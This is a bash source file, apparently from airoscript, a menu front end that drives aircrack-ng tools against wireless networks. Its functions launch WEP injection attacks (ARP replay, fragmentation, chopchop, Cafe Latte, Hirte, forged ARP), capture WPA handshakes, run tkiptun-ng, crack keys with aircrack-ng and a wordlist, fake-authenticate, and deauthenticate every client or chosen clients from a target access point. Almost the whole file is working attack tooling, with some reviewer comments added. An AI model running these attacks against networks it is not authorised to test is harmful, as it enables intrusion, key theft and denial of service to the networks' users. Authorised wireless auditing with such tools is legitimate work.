📄 airoscfunc.sh
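# NOTE(review): this listing opens inside the case statement of a menu
# function (presumably attackwep, going by the comment below); its header and
# the opening of its while/case are not visible here.
      1 ) fakeautoattack ; break ;;
      2 ) fakeinteractiveattack;$CLEAR ; break ;;
      3 ) fragnoclient ;$CLEAR; break ;;
      4 ) chopchopattack ;$CLEAR; break ;;
      5 ) cafelatteattack ;$CLEAR; break ;;
      6 ) hirteattack ;$CLEAR; break ;;
      7 ) attackclient ;$CLEAR; break ;;
      8 ) interactiveattack ;$CLEAR; break ;;
      9 ) fragmentationattack ;$CLEAR; break ;;
      10 ) fragmentationattackclient;$CLEAR ; break ;;
      11 ) chopchopattackclient;$CLEAR ; break ;;
      12 ) pskarp ;$CLEAR; break ;;
      13 ) $CLEAR;break ;;
      * ) echo -e "`gettext \"Unknown response. Try again\"`" ;;
    esac
  done
}

# Delete earlier capture files of the selected target from DUMP_PATH.
# Refuses to run when DUMP_PATH or Host_MAC is empty: the unquoted
# "rm -rf $DUMP_PATH/$Host_MAC*" used previously expands to "/*" when both
# are empty, and to every file in the dump directory when only Host_MAC is.
# Returns 1 without deleting anything in that case.
function _purge_target_dumps {
  if [ -z "$DUMP_PATH" ] || [ -z "$Host_MAC" ]; then
    echo "ERROR: DUMP_PATH or target MAC not set, old capture files not removed" >&2
    return 1
  fi
  rm -rf -- "$DUMP_PATH/$Host_MAC"*
}

# Subproducts of attackwep function:

#Option 1 (fake auth auto)
# Starts capture in the background, runs $AIREPLAY --arpreplay in a terminal
# window with FAKE_MAC as source, then shows the fake-auth menu.
# NOTE(review): INJMAC and FT are typed by the operator and expanded unquoted
# into the command line, so they are not restricted to a MAC / a single letter.
function fakeautoattack {
  if [ "$INTERACTIVE" ] # More interactive airoscript.
  then
    read -p "`gettext \"Enter destination mac: (FF:FF:FF:FF:FF:FF)\"`" INJMAC
    if [ "$INJMAC" = "" ]; then INJMAC="FF:FF:FF:FF:FF:FF"; fi
    read -p "`gettext \"Enable From or To destination bit (f/t): \"`" FT
    if [ "$FT" = "" ]; then FT="f"; fi
  else
    INJMAC="FF:FF:FF:FF:FF:FF"
    FT="f"
  fi
  capture &
  $CDCMD $TERMINAL $HOLD $TITLEFLAG "`gettext \"Injection: Host: $Host_MAC\"`" $BOTTOMLEFT $BGC "$BACKGROUND_COLOR" $FGC "$INJECTION_COLOR" \
    $EXECFLAG $AIREPLAY $IWIFI --arpreplay -b $Host_MAC -d $INJMAC -$FT 1 -m 68 -n 86 -h $FAKE_MAC -x $INJECTRATE &
  choosefake
}

#Option 2 (fake auth interactive)
# Same flow as option 1, but runs $AIREPLAY --interactive and asks for a
# frame control word (default 0841) instead of the From/To bit.
function fakeinteractiveattack {
  if [ "$INTERACTIVE" ] # More interactive airoscript.
  then
    read -p "`gettext \"Enter destination mac: (FF:FF:FF:FF:FF:FF)\"`" INJMAC
    if [ "$INJMAC" = "" ]; then INJMAC="FF:FF:FF:FF:FF:FF"; fi
    read -p "`gettext \"Set framecontrol word (hex): (0841) \"`" FT
    if [ "$FT" = "" ]; then FT="0841"; fi
  else
    INJMAC="FF:FF:FF:FF:FF:FF"
    FT="0841"
  fi
  capture &
  $CDCMD $TERMINAL $HOLD $TITLEFLAG "`gettext 'Interactive Packet Sel on Host: $Host_SSID'`" $BOTTOMLEFT $BGC "$BACKGROUND_COLOR" $FGC "$INJECTION_COLOR" \
    $EXECFLAG $AIREPLAY $IWIFI --interactive -p $FT -c $INJMAC -b $Host_MAC -h $FAKE_MAC -x $INJECTRATE &
  choosefake
}

#Option 3 (fragmentation attack)
# Removes earlier .xor/.cap files, kills running airodump-ng/aireplay-ng,
# then starts $AIREPLAY -5 with FAKE_MAC and shows the inject menu.
function fragnoclient {
  rm -rf fragment-*.xor
  rm -rf $DUMP_PATH/frag_*.cap
  _purge_target_dumps
  killall -9 airodump-ng aireplay-ng # FIXME Is this a good idea? I think we should save pids of what we launched, and then kill them.
  $CDCMD $TERMINAL $HOLD $BOTTOMLEFT $BGC "$BACKGROUND_COLOR" $FGC "$INJECTION_COLOR" $TITLEFLAG "`gettext \"Fragmentation attack on $Host_SSID\"` " \
    $EXECFLAG $AIREPLAY -5 -b $Host_MAC -h $FAKE_MAC -k $FRAG_CLIENT_IP -l $FRAG_HOST_IP $IWIFI &
  capture &
  choosefake &
  injectmenu
}

#Option 4 (chopchopattack)
# Clears old capture files, starts capture and fakeauth3 in the background,
# runs $AIREPLAY --chopchop in a terminal window, then shows the inject menu.
function chopchopattack {
  $CLEAR
  _purge_target_dumps
  rm -rf replay_dec-*.xor
  capture &
  fakeauth3 &
  $CDCMD $TERMINAL $HOLD $TITLEFLAG "`gettext 'ChopChoping:'` $Host_SSID " $BOTTOMLEFT $BGC "$BACKGROUND_COLOR" $FGC "$DEAUTH_COLOR" \
    $EXECFLAG $AIREPLAY --chopchop -b $Host_MAC -h $FAKE_MAC $IWIFI &
  injectmenu
}

#Option 5 (caffe late attack)
# Starts capture, runs $AIREPLAY -6 in a terminal window, starts fakeauth3
# in the background and returns to menufonction.
function cafelatteattack {
  capture &
  $CDCMD $TERMINAL $HOLD $TITLEFLAG "`gettext 'Cafe Latte Attack on:'` $Host_SSID " $BOTTOMLEFT $BGC "$BACKGROUND_COLOR" $FGC "$INJECTION_COLOR" \
    $EXECFLAG $AIREPLAY -6 -b $Host_MAC -h $FAKE_MAC -x $INJECTRATE -D $IWIFI &
  fakeauth3 &
  menufonction
}

#Option 6 (hirte attack)
# Same flow as option 5 with $AIREPLAY -7.
function hirteattack {
  capture &
  $CDCMD $TERMINAL $HOLD $TITLEFLAG "`gettext 'Hirte Attack on:'` $Host_SSID" $BOTTOMLEFT $BGC "$BACKGROUND_COLOR" $FGC "$INJECTION_COLOR" \
    $EXECFLAG $AIREPLAY -7 -b $Host_MAC -h $FAKE_MAC -x $INJECTRATE -D $IWIFI &
  fakeauth3 &
  menufonction
}

#Option 7 (Auto arp replay)
# As option 1, but uses Client_MAC as source and returns to menufonction.
function attackclient {
  if [ "$INTERACTIVE" ] # More interactive airoscript.
  then
    read -p "`gettext \"Enter destination mac: (FF:FF:FF:FF:FF:FF)\"`" INJMAC
    if [ "$INJMAC" = "" ]; then INJMAC="FF:FF:FF:FF:FF:FF"; fi
    read -p "`gettext 'Enable From or To destination bit (f/t): '`" FT
    if [ "$FT" = "" ]; then FT="f"; fi
  else
    INJMAC="FF:FF:FF:FF:FF:FF"
    FT="f"
  fi
  capture &
  $CDCMD $TERMINAL $HOLD $TITLEFLAG "`gettext 'Injection:'` `gettext 'Host'` : $Host_MAC `gettext 'Client'` : $Client_MAC" $BOTTOMLEFT $BGC "$BACKGROUND_COLOR" $FGC "$INJECTION_COLOR" \
    $EXECFLAG $AIREPLAY $IWIFI --arpreplay -b $Host_MAC -d $INJMAC -$FT 1 -m 68 -n 86 -h $Client_MAC -x $INJECTRATE &
  menufonction
}

#Option 8 (interactive arp replay)
# As option 2, but passes Client_MAC and returns to menufonction.
function interactiveattack {
  if [ "$INTERACTIVE" ] # More interactive airoscript.
  then
    read -p "`gettext 'Enter destination mac: (FF:FF:FF:FF:FF:FF)'`" INJMAC
    if [ "$INJMAC" = "" ]; then INJMAC="FF:FF:FF:FF:FF:FF"; fi
    read -p "`gettext 'Set framecontrol word (hex): (0841) '`" FT
    if [ "$FT" = "" ]; then FT="0841"; fi
  else
    INJMAC="FF:FF:FF:FF:FF:FF"
    FT="0841"
  fi
  capture &
  $CDCMD $TERMINAL $HOLD $TITLEFLAG "`gettext 'Interactive Packet Sel on:'` $Host_SSID" $BOTTOMLEFT $BGC "$BACKGROUND_COLOR" $FGC "$INJECTION_COLOR" \
    $EXECFLAG $AIREPLAY $IWIFI --interactive -p $FT -c $INJMAC -b $Host_MAC $Client_MAC -x $INJECTRATE &
  menufonction
}

#Option 9 (fragmentation attack)
# As option 3, but with Client_MAC as source and without the fake-auth menu.
function fragmentationattack {
  rm -rf fragment-*.xor
  rm -rf $DUMP_PATH/frag_*.cap
  _purge_target_dumps
  killall -9 airodump-ng aireplay-ng
  $CDCMD $TERMINAL $HOLD $BOTTOMLEFT $BGC "$BACKGROUND_COLOR" $FGC "$INJECTION_COLOR" $TITLEFLAG "`gettext \"Fragmentation attack on $Host_SSID\"`" \
    $EXECFLAG $AIREPLAY -5 -b $Host_MAC -h $Client_MAC -k $FRAG_CLIENT_IP -l $FRAG_HOST_IP $IWIFI &
  capture &
  injectmenu
}

#Option 10 (fragmentation attack with client)
# Same clean-up as option 9; runs $AIREPLAY -7 with Client_MAC as source.
function fragmentationattackclient {
  rm -rf fragment-*.xor
  rm -rf $DUMP_PATH/frag_*.cap
  _purge_target_dumps
  killall -9 airodump-ng aireplay-ng
  $CDCMD $TERMINAL $HOLD $BOTTOMLEFT $BGC "$BACKGROUND_COLOR" $FGC "$INJECTION_COLOR" $TITLEFLAG "`gettext \"Fragmentation attack on $Host_SSID\"`" \
    $EXECFLAG $AIREPLAY -7 -b $Host_MAC -h $Client_MAC -k $FRAG_CLIENT_IP -l $FRAG_HOST_IP $IWIFI &
  capture &
  injectmenu
}

#Option 11
# As option 4, but with Client_MAC as source and without fakeauth3.
function chopchopattackclient {
  $CLEAR
  _purge_target_dumps
  rm -rf replay_dec-*.xor
  capture &
  $CDCMD $TERMINAL $HOLD $TITLEFLAG "`gettext 'ChopChoping: $Host_SSID'`" $BOTTOMLEFT $BGC "$BACKGROUND_COLOR" $FGC "$DEAUTH_COLOR" \
    $EXECFLAG $AIREPLAY --chopchop -h $Client_MAC $IWIFI &
  injectmenu
}

#Option 12 (pskarp)
# Builds an ARP capture file with $ARPFORGE from the dump*.xor files in
# DUMP_PATH, then replays it with $AIREPLAY --interactive.
function pskarp {
  rm -rf $DUMP_PATH/arp_*.cap
  $ARPFORGE -0 -a $Host_MAC -h $Client_MAC -k $Client_IP -l $Host_IP -y $DUMP_PATH/dump*.xor -w $DUMP_PATH/arp_$Host_MAC.cap
  capture &
  $CDCMD $TERMINAL $HOLD $BOTTOMLEFT $BGC "$BACKGROUND_COLOR" $FGC "$DEAUTH_COLOR" $TITLEFLAG "`gettext \"Sending forged ARP to: $Host_SSID\"`" \
    $EXECFLAG $AIREPLAY --interactive -r $DUMP_PATH/arp_$Host_MAC.cap -h $Client_MAC -x $INJECTRATE $IWIFI &
  menufonction
}
# End of subproducts.

# If wpa
# Removes old capture files for the target and starts $AIRODUMP on the
# target's channel. NOTE(review): wpahandshake is defined a second time
# further down with the same commands; the later definition is the one in
# effect once the file has been read.
function wpahandshake {
  $CLEAR
  _purge_target_dumps
  $CDCMD $TERMINAL $HOLD $TITLEFLAG "`gettext 'Capturing data on channel:'` $Host_CHAN" $TOPLEFTBIG $BGC "$BACKGROUND_COLOR" $FGC "$DUMPING_COLOR" \
    $EXECFLAG $AIRODUMP -w $DUMP_PATH/$Host_MAC --channel $Host_CHAN -a $WIFI &
  menufonction
}

# Prints an error when the selected network is open or nothing is selected.
function attackopn {
  # If no encryption detected
  if [ "$Host_SSID" = "" ]
  then
    $CLEAR
    echo "`gettext 'ERROR: You have to select a target'`"
  else
    $CLEAR
    echo `gettext "ERROR: Network not encrypted or no network selected "`
  fi
}

# WPA menu: loops until option 1 or 2 is entered; any other input redraws
# the menu (there is no default arm).
function attackwpa {
  while true; do
    $CLEAR
    echo "`gettext '____________Select WPA Attack________# ## 1) Standard attack ## 2) Standard attack with QoS (WMM) ##___________________________________#Option: '`"
    read n
    case $n in
      1) wpahandshake; $CLEAR; break;;
      2) tkiptunstdqos; $CLEAR; break;;
    esac
  done
}

# 1 just capture
function wpahandshake {
  $CLEAR
  _purge_target_dumps
  $CDCMD $TERMINAL $HOLD $TITLEFLAG "`gettext 'Capturing data on channel:'` $Host_CHAN" $TOPLEFTBIG $BGC "$BACKGROUND_COLOR" $FGC "$DUMPING_COLOR" \
    $EXECFLAG $AIRODUMP -w $DUMP_PATH/$Host_MAC --channel $Host_CHAN -a $WIFI &
  menufonction
}

# 2 Use tkiptun-ng
# Removes old capture files, sets the channel on WIFICARD and runs $TKIPTUN
# in a terminal window.
function tkiptunstdqos {
  $CLEAR
  _purge_target_dumps
  ifconfig $WIFICARD channel $Host_CHAN # Hope this is ok for all cards
  $CDCMD $TERMINAL $HOLD $TITLEFLAG "`gettext 'Executing tkiptun-ng for ap'` $Host_MAC" $TOPLEFTBIG $BGC "$BACKGROUND_COLOR" $FGC "$DUMPING_COLOR" \
    $EXECFLAG $TKIPTUN -h $FAKE_MAC -a $Host_MAC -m $TKIPTUN_MIN_PL -n $TKIPTUN_MAX_PL $WIFI &
  menufonction
}

##########################################################################################
# This is for CRACK (4) option:
##########################################################################################

# Cracking menu. With EXTERNAL=1 it offers the external tools (wld, jtd) next
# to aircrack-ng; otherwise it goes straight to selectcracking.
function witchcrack {
  if [ "$EXTERNAL" = "1" ]
  then
    while true; do
      echo -e -n "`gettext ' || || \/ _____________________________________ ## WEP/WPA CRACKING OPTIONS ## ## ## ## 1) Use Wlandecrypter ## ## 2) Use Jazzteldecrypter ## ## 3) Use aircrack-ng ## ## 4) Return to main menu ## ##_________________________________## Option:'`"
      read yn
      case $yn in
        1 ) wld ; break ;;
        2 ) jtd ; break ;;
        3 ) selectcracking ; break ;;
        4 ) $CLEAR; break;;
        * ) echo "Unknown response. Try again" ;;
      esac
    done
  else
    echo "No external functions loaded, defaulting to wep/wpa cracking"
    selectcracking
  fi
}

# Dispatches on Host_ENC: error for open/unset, crack for WEP, wpacrack for
# anything else. Host_ENC is compared both with and without padding spaces.
function selectcracking {
  if [ "$Host_ENC" = "OPN" ] || [ "$Host_ENC" = "" ] || [ "$Host_ENC" = " OPN " ]
  then
    $CLEAR
    echo `gettext "ERROR: Network not encrypted or no network selected "`
  else
    if [ "$Host_ENC" = " WEP " ] || [ "$Host_ENC" = "WEP" ]
    then
      crack
    else
      wpacrack
    fi
  fi
}

#This is crack function, for WEP encryption:
function crack {
  while true; do
    echo -e -n "`gettext ' _____________________________________ ## WEP CRACKING OPTIONS ## ## ## ## 1) aircrack-ng PTW attack ## ## 2) aircrack-ng standard ## ## 3) aircrack-ng user options ## ## ## ##_________________________________## Option: '`"
    read yn
    case $yn in
      1 ) crackptw ; $CLEAR; break ;;
      2 ) crackstd ; $CLEAR; break ;;
      3 ) crackman ; $CLEAR; break ;;
      * ) echo "`gettext 'Unknown response. Try again'`" ;;
    esac
  done
}

# Those are subproducts of crack for wep.
# Each runs $AIRCRACK in a terminal window on $DUMP_PATH/$Host_MAC-01.cap and
# returns to menufonction.
function crackptw {
  $TERMINAL $HOLDFLAG $TITLEFLAG "Aircracking-PTW: $Host_SSID" $TOPRIGHTBIG \
    $EXECFLAG $AIRCRACK -z -b $Host_MAC -f $FUDGEFACTOR -0 -s $DUMP_PATH/$Host_MAC-01.cap &
  menufonction
}

function crackstd {
  $TERMINAL $HOLDFLAG $TITLEFLAG "Aircracking: $Host_SSID" $TOPRIGHTBIG \
    $EXECFLAG $AIRCRACK -a 1 -b $Host_MAC -f $FUDGEFACTOR -0 -s $DUMP_PATH/$Host_MAC-01.cap &
  menufonction
}

# Asks for the fudge factor and key size before running $AIRCRACK.
# NOTE(review): the two "set --" calls replace the function's positional
# parameters; nothing visible here reads them afterwards.
function crackman {
  echo -n "type fudge factor"
  read FUDGE_FACTOR
  echo You typed: $FUDGE_FACTOR
  set -- ${FUDGE_FACTOR}
  echo -e -n "`gettext \"type encryption size 64,128 etc...\"`"
  read ENC_SIZE
  echo You typed: $ENC_SIZE
  set -- ${ENC_SIZE}
  $TERMINAL $HOLDFLAG $TITLEFLAG "`gettext 'Manual cracking:'` $Host_SSID" $TOPRIGHTBIG \
    $EXECFLAG $AIRCRACK -a 1 -b $Host_MAC -f $FUDGE_FACTOR -n $ENC_SIZE -0 -s $DUMP_PATH/$Host_MAC-01.cap &
  menufonction
}

# This is for wpa cracking
function wpacrack {
  $TERMINAL $HOLDFLAG $TOPRIGHT $TITLEFLAG "Aircracking: $Host_SSID" \
    $EXECFLAG $AIRCRACKOLD $FORCEWPAKOREK -a 2 -b $Host_MAC -0 -s $DUMP_PATH/$Host_MAC-01.cap -w $WORDLIST &
  menufonction
  # There was a -0 -s before $DPATH/$HmaC but -0 is not documented, anyway, it works, so I replaced it (-s is for showing ascii key)
}

##########################################################################################
# This is for Fake auth (5) option:
##########################################################################################
# This is the function to select Target from a list
# MAJOR CREDITS TO: Befa , MY MASTER, I have an ALTAR dedicated to him in my living room
# And HIRTE for making all those great patch and fixing the SSID issue
##########################################################################################

# Fake-auth menu; requires a selected target (Host_SSID non-empty).
function choosefake {
  if [ "$Host_SSID" = "" ]
  then
    $CLEAR
    echo "ERROR: You have to select a target first"
  else
    while true; do
      echo -n -e "`gettext ' || || \/ ______________Fake auth______________## Select fakeauth method #### #### 1) Conservative #### 2) Standard #### 3) Progressive ####_________________________________##Option: '`"
      read yn
      case $yn in
        1 ) fakeauth1 ;$CLEAR; break ;;
        2 ) fakeauth2 ;$CLEAR; break ;;
        3 ) fakeauth3 ;$CLEAR; break ;;
        * ) echo "Unknown response. Try again" ;;
      esac
    done
  fi
}

# Those are subproducts of choosefake
# The three variants differ only in the --fakeauth delay and the -o/-q values.
function fakeauth1 {
  $TERMINAL $HOLD $TITLEFLAG "`gettext 'Associating with:'` $Host_SSID " $BOTTOMRIGHT $BGC "$BACKGROUND_COLOR" $FGC "$ASSOCIATION_COLOR" \
    $EXECFLAG $AIREPLAY --fakeauth 6000 -o 1 -q 10 -e "$Host_SSID" -a $Host_MAC -h $FAKE_MAC $IWIFI &
  menufonction
}

function fakeauth2 {
  $TERMINAL $HOLD $TITLEFLAG "`gettext 'Associating with:'`$Host_SSID" $BOTTOMRIGHT $BGC "$BACKGROUND_COLOR" $FGC "$ASSOCIATION_COLOR" \
    $EXECFLAG $AIREPLAY --fakeauth 0 -e "$Host_SSID" -a $Host_MAC -h $FAKE_MAC $IWIFI &
  menufonction
}

function fakeauth3 {
  $TERMINAL $HOLD $TITLEFLAG "`gettext 'Associating with:'`$Host_SSID" $BOTTOMRIGHT $BGC "$BACKGROUND_COLOR" $FGC "$ASSOCIATION_COLOR" \
    $EXECFLAG $AIREPLAY --fakeauth 5 -o 10 -q 1 -e "$Host_SSID" -a $Host_MAC -h $FAKE_MAC $IWIFI &
  menufonction
}

##########################################################################################
# This is for deauth (6) option:
##########################################################################################

# Deauth menu; requires a selected target (Host_SSID non-empty).
function choosedeauth {
  if [ "$Host_SSID" = "" ]
  then
    $CLEAR
    echo "ERROR: You have to select a target first"
  else
    while true; do
      echo -n -e "`gettext ' || || \/ _____________________________________## Who do you want to deauth ? #### #### 1) Everybody #### 2) Myself (the Fake MAC) #### 3) Selected client ####_________________________________##Option: '`"
      read yn
      case $yn in
        1 ) deauthall ; $CLEAR ; break ;;
        2 ) deauthfake ; $CLEAR ; break ;;
        3 ) deauthclient ; $CLEAR; break ;;
        * ) echo -e "`gettext \"Unknown response. Try again\"`" ;;
      esac
    done
  fi
}

# Subproducts of choosedeauth
# Unlike the functions above, these run the terminal command in the
# foreground (no trailing &).
function deauthall {
  $TERMINAL $HOLD $TOPRIGHT $BGC "$BACKGROUND_COLOR" $FGC "$DEAUTH_COLOR" $TITLEFLAG "`gettext 'Kicking everybody from:'` $Host_SSID" \
    $EXECFLAG $AIREPLAY --deauth $DEAUTHTIME -a $Host_MAC $WIFI
}

function deauthclient {
  if [ "$Client_MAC" = "" ]
  then
    $CLEAR
    echo "ERROR: You have to select a client first"
  else
    $TERMINAL $HOLD $TOPRIGHT $BGC "$BACKGROUND_COLOR" $FGC "$DEAUTH_COLOR" $TITLEFLAG "`gettext 'Kicking $Client_MAC from:'` $Host_SSID" \
      $EXECFLAG $AIREPLAY --deauth $DEAUTHTIME -a $Host_MAC -c $Client_MAC $IWIFI
  fi
}

function deauthfake {
  $TERMINAL $HOLD $TOPRIGHT $BGC "$BACKGROUND_COLOR" $FGC "$DEAUTH_COLOR" $TITLEFLAG "`gettext 'Kicking'` $FAKE_MAC ( $Host_SSID )" \
    $EXECFLAG $AIREPLAY --deauth $DEAUTHTIME -a $Host_MAC -c $FAKE_MAC $IWIFI
}

##########################################################################################
# This is for others (7) option:
##########################################################################################

# Miscellaneous-tasks menu.
function optionmenu {
  while true; do
    echo -e -n "`gettext ' || || \/ _____________________________________## Select task to perform #### #### 1) Test injection #### 2) Select another interface #### 3) Reset selected interface #### 4) Change MAC of interface #### 5) Mdk3 #### 6) Wesside-ng #### 7) Enable monitor mode #### 8) Checks with airmon-ng #### 9) Change DUMP_PATH #### 10) Return to main menu ####_________________________________##Option: '`"
    read yn
    echo ""
    case $yn in
      1 ) inject_test ; $CLEAR; break ;;
      # Was "$ClEAR" (lower-case l), which expands to nothing, so the
      # screen was never cleared after this option.
      2 ) setinterface2 ; $CLEAR; break ;;
      3 ) cleanup ;$CLEAR; break ;;
      4 ) wichchangemac ; $CLEAR; break ;;
      5 ) choosemdk ;$CLEAR; break;;
      6 ) choosewesside ;$CLEAR; break ;;
      7 ) monitor_interface;$CLEAR ; break ;;
      8 ) airmoncheck ;$CLEAR; break ;;
      9 ) changedumppath;$CLEAR; break;;
      10 ) $CLEAR;break ;;
      * ) echo -e "`gettext \"Unknown response. Try again\"`" ;;
    esac
  done
}

# I suppose all these are part of this option:
# 1.
function inject_test {
  $TERMINAL $HOLD $TOPLEFTBIG $BGC "$BACKGROUND_COLOR" $FGC "$INJECTION_COLOR" $EXECFLAG $AIREPLAY $IWIFI --test &
  menufonction
}

# 2.
# Lets the operator pick an interface from $INTERFACES and exports it as
# WIFICARD. NOTE(review): the listing ends inside this function; the handling
# of the monitor-mode answer and the closing brace are not visible here.
function setinterface2 {
  echo "`gettext 'Select your interface:'`"
  select WIFI in $INTERFACES; do break; done
  export WIFICARD=$WIFI
  echo -n `gettext 'Should I put it in monitor mode?'` " (Y/n) "
  read answer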